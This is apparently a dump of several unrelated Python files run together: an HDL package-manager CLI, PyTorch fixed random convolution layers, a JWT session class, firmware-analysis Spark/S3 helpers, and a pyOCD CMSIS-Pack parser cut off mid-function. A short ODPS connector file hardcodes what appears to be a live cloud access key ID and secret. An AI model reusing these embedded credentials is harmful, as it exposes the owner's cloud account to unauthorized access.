HDL_SUFFIXES_TUPLE), untracked) untracked_hdl = list(ufilter) if untracked_hdl: fmt = 'this package has some hdl files: {}, which are not listed in {}\'s filesets' msg = fmt.format(untracked_hdl, config_path) self.warning(msg) else: # if the package is not a git repository # we walk the directory to check filesets' files validation. cwd = os.getcwd() os.chdir(root) fileset = config.get_flat_fileset() fileset = set(fileset['files']) flist = [] def files_filter(x): return x.endswith(HDL_SUFFIXES_TUPLE) # TODO: code review for (dirpath, _, filenames) in os.walk(root): dirname = os.path.relpath(dirpath, root) if not dirname == '.' and dirname.startswith('.'): continue base_dirname = os.path.basename(dirname) if not base_dirname == '.' 
and base_dirname.startswith('.'): continue if base_dirname == '.': files = map(lambda x: x, filenames) ffiles = filter(files_filter, files) ffiles = list(ffiles) flist.extend(ffiles) else: files = map(lambda x: os.path.join(dirname, x), filenames) ffiles = filter(files_filter, files) ffiles = list(ffiles) flist.extend(ffiles) cur_fset = set(flist) unlisted = cur_fset - fileset if unlisted: fmt = 'this package has some hdl files: {}, which are not listed in {}\'s filesets' msg = fmt.format(unlisted, config_path) self.warning(msg) os.chdir(cwd) # check include files directories if not self.args.include: return files = config.get_flat_fileset()['files'] resolver = IncDirsResolver(root, files) resolver.check_include_files(root, clogger=self) def enzi_config_help(self): config_name = self.args.enzi_config_help if config_name is sys.stdout or isinstance(config_name, io.TextIOWrapper): self.info('Here is the template Enzi.toml file\'s key-values hints:') sio = EnziConfigValidator.info() print(sio.getvalue()) sio.close() elif isinstance(config_name, (str, bytes)): sio = EnziConfigValidator.info() info = sio.getvalue().encode('utf-8') sio.close() outfile_dir = os.path.dirname(config_name) # Make sure the output file directory exists. # Enzi will not create the directory if it doesn't exist. if outfile_dir and not os.path.exists(outfile_dir): outname = os.path.basename(config_name) fmt = 'path \'{}\' for \'{}\' does not exist' msg = fmt.format(outfile_dir, outname) self.error(msg) sys.exit(1) if os.path.exists(config_name): msg = '{} is already exists'.format(config_name) self.error(msg) sys.exit(1) outfile = io.FileIO(config_name, 'w') owriter = io.BufferedWriter(outfile) owriter.write(info) owriter.close() msg = 'Generated the template Enzi.toml file\'s key-values hints in ' + config_name self.info(msg) def update_package_version(self, version, *, validated=False): """update the package version of the Enzi.toml in the given root""" if type(version) != str: raise ValueError('Version must be a string') if not validated: raw_version = version.strip() if raw_version.startswith('v'): raw_version = raw_version.strip()[1:] version = VersionValidator( key='version', val=raw_version).validate() root = self.args.root config = self.args.config config = config if config else 'Enzi.toml' config_path = os.path.join(root, config) with open(config_path, 'r') as f: data = f.read() lines = data.splitlines() nlines = len(lines) # find the package section idx = -1 for i, line in enumerate(lines): if PKG_SECTION_RE.search(line): idx = i break if idx == -1: self.error('No package section found') raise SystemExit(1) for i in range(idx, nlines): v_search = VERISON_FIELD_RE.search(lines[i]) if v_search: found_version = v_search.groupdict()['version'] if version in found_version: return new_version_line = lines[i].replace(found_version, version) lines[i] = new_version_line break # lines to write back # print(lines) mlines = map(lambda x: x + '\n', lines) with open(config_path, 'w') as f: f.writelines(mlines) self.debug('EnziApp: update_package_version done.') def update_version(self): """enzi update --version""" root = self.args.root self.info('updating the version of this Enzi package') raw_version = self.args.version.strip() if raw_version.startswith('v'): raw_version = raw_version.strip()[1:] version = VersionValidator(key='version', val=raw_version).validate() git = Git(root) tags = git.list_tags() exists = False if tags: exists = any(filter(lambda x: version in x, tags)) version = 'v' + version if exists: msg = 
'Version tag {} already exists'.format(version) self.error(msg) raise SystemExit(BASE_ESTRING + msg) vtag = version if git.has_changed(): self.debug('This package has changed. Update its git repo.') git = self.update_git() if git is None: raise SystemExit(1) self.args.message = version self.update_package_version(version[1:], validated=True) git = self.update_git() git.quiet_spawn_with( lambda x: x.arg('tag').arg(vtag) ) self.info('update to version {} finished'.format(vtag)) def update_git(self): """update the package's git repository""" root = self.args.root name = self.enzi.name self.info('updating this Enzi package\'s git repository') try: validate_git_repo(name, root) except Exception as e: msg = str(e) raise SystemExit(BASE_ESTRING + msg) git = Git(root) # untracked and modified files untracked = git.list_untracked() modified = git.list_modified() cached = git.list_cached() if 'Enzi.toml' not in cached: git.add_files('Enzi.toml') try: self.enzi.check_filesets() except Exception: raise SystemExit(1) from None fileset = self.enzi.get_flat_fileset() if fileset: _files = fileset['files'] git.add_files(_files) # DEBUG msg p = pprint.pformat(untracked) logger.debug('untracked files: ' + p) p = pprint.pformat(modified) logger.debug('modified files: ' + p) # filter out HDL files in untracked files ufilter = filter(lambda x: x.endswith(HDL_SUFFIXES_TUPLE), untracked) ufiltered = list(ufilter) if ufiltered: msg = 'This Package({}) contains untracked HDL files!'.format(name) self.warning(msg) ufiles = '\n'.join(ufiltered) msg = 'Here is the untracked HDL files:\n{}'.format(ufiles) self.warning(msg) msg = 'Do you want to update this package\'s git repository without these HDL files?' self.warning(msg) confirm = self.get_confirm() if confirm is None: return None if not confirm: msg = 'You must manually update the Enzi.toml\'s filesets section with the expected HDL files.' logger.error(msg) raise SystemExit(BASE_ESTRING + msg) # staged modified files # print(modified) git.add_files(modified) # log commit message message = self.args.message if message is None: message = AUTO_COMMIT_MESSAGE fmt = 'update this package\'s git repository with commit message:{} "{}"' msg = fmt.format(Fore.BLUE, message) logger.info(msg) git.quiet_spawn_with( lambda x: x.arg('commit') .arg('-m') .arg(message) ) self.info('update git finished') return git def update_deps(self, **kwargs): """ the default behaviour of enzi update """ enzi = kwargs.get('enzi', self.enzi) if not isinstance(enzi, Enzi): return self.info('start updating') enzi.init(update=True) self.info('updating finished') def clean(self, **kwargs): """ Enzi clean task, enzi [--root ROOT] [--config CONFIG] [--silence-mode] clean [--yes] """ yes = kwargs.get('yes', self.args.yes) root = kwargs.get('root', self.args.root) config_name = kwargs.get('config', self.args.config) if yes: confirm = yes else: if root: fmt = 'clean will clean up the build directory in \'{}\'' msg = fmt.format(root) self.warning(msg) else: self.warning('clean will clean up the build directory') confirm = self.get_confirm() if confirm != True: return root = root if root else '.' 
config_name = config_name if config_name else 'Enzi.toml' config_root = os.path.join(root, config_name) valid_root = os.path.exists(config_root) if not valid_root: msg = 'No {} in root directory \'{}\''.format(config_name, root) self.warning(msg) logger.info("Nothing to do.") return if confirm and os.path.exists('build'): shutil.rmtree('build', onerror=rmtree_onerror) if confirm and os.path.exists('Enzi.lock'): os.remove('Enzi.lock') logger.info(Fore.BLUE + 'finished cleaning') def get_confirm(self): """get confirmation from user""" self.warning('Would you like to execute[y/N]: ') _choice = input() choice = _choice.lower() if _choice else 'n' err_msg = "must input yes(y)/no(n), not " + _choice if not choice.startswith(('y', 'n')): self.error(err_msg) return if choice == 'y' or choice == 'yes': confirm = True elif choice == 'n' or choice == 'no': self.info("Nothing to do.") confirm = False else: self.error(err_msg) confirm = None return confirm @staticmethod def parse_args(input_args=None): supported_targets = ['build', 'sim', 'run', 'program_device'] available_tasks = ['clean', 'update', 'init', 'check'] parser = argparse.ArgumentParser() subparsers = parser.add_subparsers() parser.add_argument("-l", "--log", dest="log_level", help='Set Enzi self log level', choices=[ 'DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL']) # Global options parser.add_argument( '--root', help='Enzi project root directory, default is current directory', default='.') parser.add_argument('--silence-mode', '-s', help='Only capture stderr', action='store_true') parser.add_argument( '--config', help='Specify the Enzi.toml file to use') parser.add_argument( '--non-lazy', help='Force Enzi to (re)generated corresponding backend configuration when running target', action='store_true') parser.add_argument('--enzi-config-help', help='Output an Enzi.toml file\'s key-values hints. \ If no output file is specified, Enzi will print to stdout.', action=OptionalAction, default=sys.stdout) # clean up args. clean_parser = subparsers.add_parser( 'clean', help='Clean all Enzi generated files') clean_parser.add_argument( '-y', '--yes', help='Skip clean up confirmation', action='store_true') clean_parser.set_defaults(task='clean') # update dependencies update_parser = subparsers.add_parser( 'update', help='Update dependencies') # whether to update current Enzi's git commit update_parser.add_argument( '--git', help='Update the current Enzi package\'s git commits, if it is a git repo.', action='store_true') # version bump for current Enzi project # if it is a git repo, Enzi will auto change package version in Enzi.toml. # Then Enzi will commit and tag with the given version update_parser.add_argument( '--version', '-v', help='''Bump version for the current Enzi project. If it is a git repo, Enzi will auto change package version in Enzi.toml and then commit and tag with the given version. If not, Enzi just update the package version in Enzi.toml. 
''' ) update_parser.add_argument( '--message', '-m', help='Commit message for update git repository, if no message is specified, the message will be: "auto commit by Enzi"', action=OptionalAction, default=AUTO_COMMIT_MESSAGE) update_parser.set_defaults(task='update') # init task init_parser = subparsers.add_parser( 'init', help='Initialize an Enzi package with a given package name') init_parser.add_argument( 'name', help='the package name to initialize', action=OptionalAction) init_parser.set_defaults(task='init') # check task check_parser = subparsers.add_parser( 'check', help='Check validation of the package in the given path' ) check_parser.add_argument( '--manifest', help='Check Enzi.toml only', action='store_true' ) check_parser.add_argument( '--include', help='''Check Verilog the correctness and existence for all include files of the Verilog/SystemVerilog files delcared at Enzi.toml filesets sections. ''', action='store_true' ) check_parser.set_defaults(task='check') # build subparser build_parser = subparsers.add_parser( 'build', help='Build the given project') build_parser.add_argument('--tool', help='Override the default target') build_parser.add_argument( '--gui', help='Build in GUI mode, if this tool has a GUI.', action='store_true') build_parser.set_defaults(target='build') # run subparser run_parser = subparsers.add_parser('run', help='Run the given project') run_parser.add_argument('--tool', help='Override the default tool') run_parser.add_argument( '--gui', help='Run in GUI mode, if this tool has a GUI.', action='store_true') run_parser.set_defaults(target='run') # sim subparser sim_parser = subparsers.add_parser( 'sim', help='Simulate the given project') sim_parser.add_argument('--tool', help='Override the default tool') sim_parser.add_argument( '--gui', help='Simulate in GUI mode, if this tool has a GUI.', action='store_true') sim_parser.set_defaults(target='sim') # program_device subparser pd_parser = subparsers.add_parser( 'program_device', help='Program the given project to device(unimplemented yet)') pd_parser.add_argument('--tool', help='Override the default tool') pd_parser.set_defaults(target='program_device') if input_args: args = parser.parse_args(input_args) else: args = parser.parse_args() if not args.enzi_config_help is None: return (args, parser) if hasattr(args, 'target') or hasattr(args, 'task'): return (args, parser) else: logger.error('Target or Task must be specified') logger.error('Supported targets: {}'.format(supported_targets)) logger.error('Available tasks: {}'.format(available_tasks)) sys.exit(1) import torch import torch.nn as nn import torch.nn.functional as F class RandomFixedConv2d(nn.Module): """ A fixed random convolution. Wrapper for a more convenient use. Basically create a new convolution, initialize it and set `requires_grad_(False)` flag. """ def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0, groups=1, dilation=1, bias=True, padding_mode='zeros'): super(RandomFixedConv2d, self).__init__() self.conv = nn.Conv2d( in_channels, out_channels, kernel_size, stride, padding, dilation, groups, bias, padding_mode) self.requires_grad_(False) def forward(self, x): return self.conv(x) class RandomFixedConvTrans2d(nn.Module): """ A tranposed fixed random convolution. Wrapper for a more convenient use. Basically create a new convolution, initialize it and set `requires_grad_(False)` flag. 
""" def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0, output_padding=0, groups=1, dilation=1, bias=True, padding_mode='zeros'): super(RandomFixedConvTrans2d, self).__init__() self.conv = nn.ConvTranspose2d( in_channels, out_channels, kernel_size, stride, padding, output_padding, groups, bias, dilation, padding_mode) self.requires_grad_(False) def forward(self, x): return self.conv(x) class RandomFixedSeparableConv2d(nn.Module): """ Depthwise convolution with fixed random kernels followed by a trainable 1x1 convolution. """ def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, bias=True, padding_mode='zeros'): super(RandomFixedSeparableConv2d, self).__init__() self.fixed_conv = RandomFixedConv2d( in_channels, in_channels, kernel_size, stride, padding, groups=in_channels, dilation=dilation, bias=bias, padding_mode=padding_mode) self.conv1x1 = nn.Conv2d(in_channels, out_channels, kernel_size=1, stride=1, padding=0, bias=bias) def forward(self, x): x = self.fixed_conv(x) x = self.conv1x1(x) return x class RandomFixedSeparableConvTrans2d(nn.Module): """ Transposed depthwise convolution with fixed random kernels preceeded by a trainable 1x1 convolution. """ def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0, output_padding=0, dilation=1, bias=True, padding_mode='zeros'): super(RandomFixedSeparableConvTrans2d, self).__init__() self.conv1x1 = nn.Conv2d(in_channels, out_channels, kernel_size=1, stride=1, padding=0, bias=bias) self.fixed_conv = RandomFixedConvTrans2d( out_channels, out_channels, kernel_size, stride, padding, output_padding, groups=out_channels, dilation=dilation, bias=bias, padding_mode=padding_mode) def forward(self, x): x = self.conv1x1(x) x = self.fixed_conv(x) return x # -*- coding: UTF-8 -*- """ 用户会话相关API. 
""" import time import jwt from model.user import User from util import misc from const import JWT class UserSession: """ 用户会话 """ user = None expired_at = 0 # 新建一个用户会话 def __init__(self, token=None, phone=None): if token: self.__init_by_token(token) elif phone: self.__init_by_phone(phone) if not self.user or not self.user.exist(): self.user = None # 当前会话是否可用 def is_login(self): return bool(self.user) \ and not self.__is_expired() # 获取会话token def get_token(self): """ 返回token """ if not self.is_login(): return None return jwt.encode({ 'uid': self.user.uid, 'expired_at': self.expired_at, }, key=JWT.key, algorithm=JWT.algorithm) # 会话是否过期 def __is_expired(self): return time.time() >= self.expired_at def __init_by_phone(self, phone): self.expired_at = int(time.time()) + JWT.TTL phone = misc.encrypt_phone(phone) self.user = User(phone=phone) if not self.user.exist(): # 如果手机号不存在,则注册一个 self.user.create() def __init_by_token(self, token): try: jwt_data = jwt.decode(token, JWT.key, algorithms=[JWT.algorithm]) except jwt.exceptions.InvalidSignatureError: return if 'uid' not in jwt_data or 'expired_at' not in jwt_data: return self.user = User(uid=jwt_data['uid']) self.expired_at = int(jwt_data['expired_at']) src/finitestate/firmware/fsglue/glue.py0 import base64 import hashlib import json import logging import os import time from typing import Iterable from botocore.exceptions import ClientError from pyspark.sql import DataFrame, SparkSession from pyspark.sql.types import Row, StructType from pyspark.sql.utils import AnalysisException from finitestate.firmware.bloomfilter import get_bloom_filter_key from finitestate.firmware.schemas.schema_file_tree import file_tree_schema from finitestate.common.aws.s3 import s3_client, get_bucket_and_key_from_uri from finitestate.common.aws.catalogutils import using_boto3 as get_data_catalog from finitestate.common.aws.glue import ExecutorGlobals logger = logging.getLogger(__name__) def load_dataframe_from_glue_table(database: str, table_name: str, glue_context) -> DataFrame: return glue_context.spark_session.table('{}.{}'.format(database, table_name)) def downselect_dataframe(dataframe: DataFrame, list_of_columns_to_select) -> DataFrame: return dataframe.select(*list_of_columns_to_select) def publish_jsonl_to_s3(key, row, target_bucket, max_retries=5, validate_payload_checksum=False): """ Publishes individual rows to S3 as minified JSON. This assumes that the entire 'row' element is written as a single JSON object to the target file. 'data_type' is the plugin-name or otherwise descriptor of the data that is to be written. Additionally, 'row' must have a 'firmware_hash' field. 
""" payload = json.dumps(row.asDict(recursive=True) if isinstance(row, Row) else row, separators=(',', ':')) output = {'Bucket': target_bucket, 'Key': key} other_kwargs = {} if validate_payload_checksum: md5 = base64.b64encode(hashlib.md5(payload.encode()).digest()).decode() output['ContentMD5'] = md5 other_kwargs['ContentMD5'] = md5 retry = 0 while retry < max_retries: try: response = ExecutorGlobals.s3_client().put_object(Bucket=target_bucket, Key=key, Body=payload, **other_kwargs) output['ETag'] = response['ETag'] output['Attempts'] = retry + 1 return output except ClientError: retry += 1 time.sleep(2**retry) output['Attempts'] = retry + 1 return output def publish_custom_cloudwatch_glue_metric(cloudwatch_client, job_name, job_run_ids, metric_name, value, unit=None, namespace=None): for job_run_id in job_run_ids: response = cloudwatch_client.put_metric_data( MetricData=[ { 'MetricName': metric_name, 'Dimensions': [{ 'Name': 'JobName', 'Value': job_name }, { 'Name': 'JobRunId', 'Value': job_run_id }], 'Unit': unit or 'None', 'Value': value }, ], Namespace=namespace or 'Glue', ) if not response or 200 != response.get('ResponseMetadata', {}).get('HTTPStatusCode'): raise Exception('Failed to publish metric: {}'.format(response)) def publish_df_as_jsonl(df, get_key_for_row, target_bucket, row_formatter=None): # yapf: disable try: return df.rdd.map( lambda row: publish_jsonl_to_s3(get_key_for_row(row), row_formatter(row) if row_formatter else row, target_bucket, validate_payload_checksum=True) ).filter( lambda output: output.get('ETag') # was written to S3 ).count() except Exception as e: print('Failed to write row as jsonl: {}'.format(e)) return 0 # yapf: enable def read_firmware_file_tree(glue_database: str, fw_sha256: str) -> DataFrame: """ Reads a firmware file tree from the jsonl files backing the file_tree table defined in the Glue Data Catalog. :param glue_database: The name of the Glue database from which to read the files, e.g. fimrware_prod. :param fw_sha256: The SHA 256 of the firmware to read. """ file_tree_path = get_data_catalog().get_table_path(glue_database, 'file_tree') return SparkSession.builder.getOrCreate().read.json(os.path.join(file_tree_path, f'{fw_sha256}.jsonl'), schema=file_tree_schema) def read_firmware_level_data(glue_database: str, table_name: str, fw_sha256: str, schema: StructType, extension: str = 'jsonl') -> DataFrame: """ Reads a json/jsonl dataset from a single file identified by a firmware sha256, with the path determined by the table projecting that data in the Glue Data Catalog. Args: glue_database: The name of the Glue database from which to read the file, e.g. firmware_prod table_name: The name of the table to read fw_sha256: The SHA 256 of the firmware to read schema: The PySpark schema for the returned data extension: The file extension of the file, typically jsonl which is the default. 
Returns: A PySpark DataFrame of the data from object storage, or an empty DataFrame with the appropriate schema """ path = get_data_catalog().get_table_path(glue_database, table_name) spark = SparkSession.builder.getOrCreate() try: return spark.read.json(os.path.join(path, f'{fw_sha256}.{extension}'), schema=schema) except AnalysisException as e: logger.exception(f'Failed to read firmware {fw_sha256} data from {path} - returning empty DataFrame') return spark.createDataFrame(spark.sparkContext.emptyRDD(), schema) def read_sbom(glue_database: str, fw_sha256: str) -> DataFrame: """ Reads an SBoM from the json files backing the sbom table defined in the Glue Data Catalog. :param glue_database: The name of the Glue database from which to read the files, e.g. fimrware_prod. :param fw_sha256: The SHA 256 of the firmware whose SBoM should be read. """ from finitestate.firmware.schemas.schema_sbom import sbom_schema sbom_path = get_data_catalog().get_table_path(glue_database, 'sbom') return SparkSession.builder.getOrCreate().read.json(os.path.join(sbom_path, f'{fw_sha256}.json'), schema=sbom_schema) def read_firmware_analytics_from_tree(glue_database: str, table_name: str, file_tree_df: DataFrame, schema: StructType) -> DataFrame: """ Reads a firmware analytic (e.g. crypto_material) from the jsonl files backing the table for that analytic in the Glue Data Catalog. The set of file hashes to read are obtained from the supplied file_tree DataFrame, which is only required to have the `file_hash` column. :param glue_database: The name of the Glue database from which to read the files, e.g. fimrware_prod. :param table_name: The name of the table to read :param file_tree_df: The file_tree DataFrame :param schema: The PySpark schema for the returned data. """ path = get_data_catalog().get_table_path(glue_database, table_name) bucket, key_prefix = get_bucket_and_key_from_uri(path) def read_file(file_hash: str): try: for line in ExecutorGlobals.s3_client().get_object(Bucket=bucket, Key=os.path.join(key_prefix, file_hash) + '.jsonl')['Body'].iter_lines(): yield line.decode('utf-8') except Exception as e: return None # yapf: disable file_hashes_rdd = file_tree_df.select( 'file_hash' ).dropna().distinct().rdd.map( lambda row: row.file_hash ) redis_host = os.environ.get('REDIS_HOST') if redis_host: redis_port = int(os.environ.get('REDIS_PORT', '6379')) bloom_filter_key = get_bloom_filter_key(key_prefix) def check_bloom_filters(partition: Iterable[str]): from more_itertools import chunked from finitestate.firmware.bloomfilter.client.redis import RedisBloomFilterClient client = RedisBloomFilterClient( redis_client=ExecutorGlobals.redisbloom_client(host=redis_host, port=redis_port) ) for file_hashes in chunked(partition, n=10000): yield from client.exists(key=bloom_filter_key, objects=file_hashes) if ExecutorGlobals.redisbloom_client(host=redis_host, port=redis_port).exists(bloom_filter_key): logger.info(f'Filtering {glue_database}.{table_name} file hashes according to bloom filter membership in {bloom_filter_key}') file_hashes_rdd = file_hashes_rdd.mapPartitions( check_bloom_filters ) else: logger.warning(f'Performing exhaustive search for files in {key_prefix}; check plugin configuration to enable use of bloom filters') return SparkSession.builder.getOrCreate().read.json( file_hashes_rdd.flatMap(read_file).filter(lambda x: x), schema=schema ) #!/usr/bin/env python #-*- coding: utf-8 -*- # @Filename: connector.py # @Author: olenji - # @Description: --- # @Create: 2019-05-13 11:56:58 # @Last Modified: 2019-05-13 
11:56:58 # from odps import ODPS, options options.sql.use_odps2_extension = True odps = ODPS('LTAItDVDpC9aEMXJ', 'U6iEFCZCzoPUbjou1FW45SQruxIfFt', 'Qkids_V2') #endpoint='**your-end-point**') #project = odps.get_project() # -*- coding: utf-8 -*- # pyOCD debugger # Copyright (c) 2019-2020 Arm Limited # Copyright (c) 2020 # Copyright (c) 2020 Fraunhofer-Gesellschaft zur Förderung der angewandten Forschung e.V. # Copyright (c) 2021 # SPDX-License-Identifier: Apache-2.0 # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from xml.etree.ElementTree import (ElementTree, Element) import zipfile import logging import io from typing import (Any, Dict, Iterator, Optional) from .flash_algo import PackFlashAlgo from ...core import exceptions from ...core.target import Target from ...core.memory_map import (MemoryMap, MemoryRegion, MemoryType, MEMORY_TYPE_CLASS_MAP, FlashRegion, RamRegion) LOG = logging.getLogger(__name__) class MalformedCmsisPackError(exceptions.TargetSupportError): """! @brief Exception raised for errors parsing a CMSIS-Pack.""" pass class _DeviceInfo(object): """! @brief Simple container class to hold XML elements describing a device.""" def __init__(self, **kwargs): self.element = kwargs.get('element', None) self.families = kwargs.get('families', []) self.memories = kwargs.get('memories', []) self.algos = kwargs.get('algos', []) self.debugs = kwargs.get('debugs', []) def _get_part_number_from_element(element: Element) -> str: """! @brief Extract the part number from a device or variant XML element.""" assert element.tag in ("device", "variant") if element.tag == "device": return element.attrib['Dname'] elif element.tag == "variant": return element.attrib['Dvariant'] else: raise ValueError("element is neither device nor variant") class CmsisPack(object): """! @brief Wraps a CMSIS Device Family Pack. This class provides a top-level interface for extracting device information from CMSIS-Packs. After an instance is constructed, a list of the devices described within the pack is available from the `devices` property. Each item in the list is a CmsisPackDevice object. The XML element hierarchy that defines devices is as follows. ``` family [-> subFamily] -> device [-> variant] ``` Internally, this class is responsible for collecting the device-related XML elements from each of the levels of the hierarchy described above. It determines which elements belong to each defined device and passes those to CmsisPackDevice. It is then CmsisPackDevice that performs the parsing of each element type into pyOCD-compatible data. """ def __init__(self, file_or_path): """! @brief Constructor. Opens the CMSIS-Pack and builds instances of CmsisPackDevice for all the devices and variants defined within the pack. @param self @param file_or_path The .pack file to open. May be a string that is the path to the pack, or may be a ZipFile, or a file-like object that is already opened. @exception MalformedCmsisPackError The pack is not a zip file, or the .pdsc file is missing from within the pack. 
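        Example (illustrative sketch; the pack filename below is hypothetical):

            pack = CmsisPack("Vendor.Example_DFP.1.0.0.pack")
            for dev in pack.devices:
                print(dev.part_number)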
""" if isinstance(file_or_path, zipfile.ZipFile): self._pack_file = file_or_path else: try: self._pack_file = zipfile.ZipFile(file_or_path, 'r') except zipfile.BadZipFile as err: raise MalformedCmsisPackError(f"Failed to open CMSIS-Pack '{file_or_path}': {err}") from err # Find the .pdsc file. for name in self._pack_file.namelist(): if name.endswith('.pdsc'): self._pdscName = name break else: raise MalformedCmsisPackError(f"CMSIS-Pack '{file_or_path}' is missing a .pdsc file") with self._pack_file.open(self._pdscName) as pdscFile: self._pdsc = CmsisPackDescription(self, pdscFile) @property def filename(self): """! @brief Accessor for the filename or path of the .pack file.""" return self._pack_file.filename @property def pdsc(self): """! @brief Accessor for the CmsisPackDescription instance for the pack's PDSC file.""" return self._pdsc @property def devices(self): """! @brief A list of CmsisPackDevice objects for every part number defined in the pack.""" return self._pdsc.devices def get_file(self, filename): """! @brief Return file-like object for a file within the pack. @param self @param filename Relative path within the pack. May use forward or back slashes. @return A BytesIO object is returned that contains all of the data from the file in the pack. This is done to isolate the returned file from how the pack was opened (due to particularities of the ZipFile implementation). """ filename = filename.replace('\\', '/') return io.BytesIO(self._pack_file.read(filename)) class CmsisPackDescription(object): def __init__(self, pack, pdsc_file): """! @brief Constructor. @param self This object. @param pack Reference to the CmsisPack instance. @param pdsc_file A file-like object for the .pdsc contained in _pack_. """ self._pack = pack # Convert PDSC into an ElementTree. self._pdsc = ElementTree(file=pdsc_file) self._state_stack = [] self._devices = [] # Remember if we have already warned about overlapping memory regions # so we can limit these to one warning per DFP self._warned_overlapping_memory_regions = False # Extract devices. for family in self._pdsc.iter('family'): self._parse_devices(family) @property def pack(self): """! @brief Reference to the containing CmsisPack object.""" return self._pack @property def devices(self): """! @brief A list of CmsisPackDevice objects for every part number defined in the pack.""" return self._devices def _parse_devices(self, parent): # Extract device description elements we care about. newState = _DeviceInfo(element=parent) children = [] for elem in parent: if elem.tag == 'memory': newState.memories.append(elem) elif elem.tag == 'algorithm': newState.algos.append(elem) elif elem.tag == 'debug': newState.debugs.append(elem) # Save any elements that we will recurse into. elif elem.tag in ('subFamily', 'device', 'variant'): children.append(elem) # Push the new device description state onto the stack. self._state_stack.append(newState) # Create a device object if this element defines one. if parent.tag in ('device', 'variant'): # Build device info from elements applying to this device. deviceInfo = _DeviceInfo(element=parent, families=self._extract_families(), memories=self._extract_memories(), algos=self._extract_algos(), debugs=self._extract_debugs() ) dev = CmsisPackDevice(self.pack, deviceInfo) self._devices.append(dev) # Recursively process subelements. 
for elem in children: self._parse_devices(elem) self._state_stack.pop() def _extract_families(self): families = [] for state in self._state_stack: elem = state.element if elem.tag == 'family': families += [elem.attrib['Dvendor'], elem.attrib['Dfamily']] elif elem.tag == 'subFamily': families += [elem.attrib['DsubFamily']] return families def _extract_items(self, state_info_name, filter): map = {} for state in self._state_stack: for elem in getattr(state, state_info_name): try: filter(map, elem) except (KeyError, ValueError) as err: LOG.debug("error parsing CMSIS-Pack: " + str(err)) return list(map.values()) def _extract_memories(self): def get_start_and_size(elem): try: start = int(elem.attrib['start'], base=0) size = int(elem.attrib['size'], base=0) except (KeyError, ValueError): LOG.warning("memory region missing address") raise return (start, size) def filter(map, elem): # Inner memory regions are allowed to override outer memory # regions. If this is not done properly via name/id, we must make # sure not to report overlapping memory regions to gdb since it # will ignore those completely, see: # https://github.com/pyocd/pyOCD/issues/980 start, size = get_start_and_size(elem) if 'name' in elem.attrib: # 'name' takes precedence over 'id'. name = elem.attrib['name'] elif 'id' in elem.attrib: name = elem.attrib['id'] else: # Neither option for memory name was specified, so use the address range. # Use the start and size for a name. name = "%08x:%08x" % (start, size) pname = elem.attrib.get('Pname', None) info = (name, pname) if info in map: del map[info] for k in list(map.keys()): prev_pname = k[1] # Previously, we would not check for overlaps if the pname was different. But because pyocd # currently only supports one memory map for the whole device, we have to ignore the pname for # now. prev_elem = map[k] prev_start, prev_size = get_start_and_size(prev_elem) # Overlap: start or end between previous start and previous end end = start + size - 1 prev_end = prev_start + prev_size - 1 if (prev_start <= start < prev_end) or (prev_start <= end < prev_end): # Only report warnings for overlapping regions from the same processor. Allow regions for different # processors to override each other, since we don't yet support maps for each processor. if (pname == prev_pname) and not self._warned_overlapping_memory_regions: filename = self.pack.filename if self.pack else "unknown" LOG.warning("Overlapping memory regions in file %s (%s); deleting outer region. " "Further warnings will be suppressed for this file.", filename, _get_part_number_from_element(self._state_stack[-1].element)) self._warned_overlapping_memory_regions = True del map[k] map[info] = elem return self._extract_items('memories', filter) def _extract_algos(self): def filter(map, elem): # We only support Keil FLM style flash algorithms (for now). if ('style' in elem.attrib) and (elem.attrib['style'] != 'Keil'): LOG.debug("skipping non-Keil flash algorithm") return None, None # Both start and size are required. start = int(elem.attrib['start'], base=0) size = int(elem.attrib['size'], base=0) memrange = (start, size) # An algo with the same range as an existing algo will override the previous. 
map[memrange] = elem return self._extract_items('algos', filter) def _extract_debugs(self): def filter(map, elem): if 'Pname' in elem.attrib: name = elem.attrib['Pname'] unit = elem.attrib.get('Punit', 0) name += str(unit) if '*' in map: map.clear() map[name] = elem else: # No processor name was provided, so this debug element applies to # all processors. map.clear() map['*'] = elem return self._extract_items('debugs', filter) def _get_bool_attribute(elem, name, default=False): """! @brief Extract an XML attribute with a boolean value. Supports "true"/"false" or "1"/"0" as the attribute values. Leading and trailing whitespace is stripped, and the comparison is case-insensitive. @param elem ElementTree.Element object. @param name String for the attribute name. @param default An optional default value if the attribute is missing. If not provided, the default is False. """ if name not in elem.attrib: return default else: value = elem.attrib[name].strip().lower() if value in ("true", "1"): return True elif value in ("false", "0"): return False else: return default class CmsisPackDevice(object): """! @brief Wraps a device defined in a CMSIS Device Family Pack. Responsible for converting the XML elements that describe the device into objects usable by pyOCD. This includes the memory map and flash algorithms. An instance of this class can represent either a `` or `` XML element from the PDSC. """ def __init__(self, pack, device_info): """! @brief Constructor. @param self @param pack The CmsisPack object that contains this device. @param device_info A _DeviceInfo object with the XML elements that describe this device. """ self._pack = pack self._info = device_info self._part = _get_part_number_from_element(device_info.element) self._regions = [] self._saw_startup = False self._default_ram = None self._memory_map = None def _build_memory_regions(self): """! @brief Creates memory region instances for the device. For each `` element in the device info, a memory region object is created and added to the `_regions` attribute. IROM or non-writable memories are created as RomRegions by this method. They will be converted to FlashRegions by _build_flash_regions(). """ for elem in self._info.memories: try: # Get the region name, type, and access permissions. if 'name' in elem.attrib: name = elem.attrib['name'] access = elem.attrib['access'] if ('p' in access): type = MemoryType.DEVICE elif ('w' in access): type = MemoryType.RAM else: type = MemoryType.ROM elif 'id' in elem.attrib: name = elem.attrib['id'] if 'RAM' in name: access = 'rwx' type = MemoryType.RAM else: access = 'rx' type = MemoryType.ROM else: continue # Both start and size are required attributes. start = int(elem.attrib['start'], base=0) size = int(elem.attrib['size'], base=0) isDefault = _get_bool_attribute(elem, 'default') isStartup = _get_bool_attribute(elem, 'startup') if isStartup: self._saw_startup = True attrs = { 'name': name, 'start': start, 'length': size, 'access': access, 'is_default': isDefault, 'is_boot_memory': isStartup, 'is_testable': isDefault, 'alias': 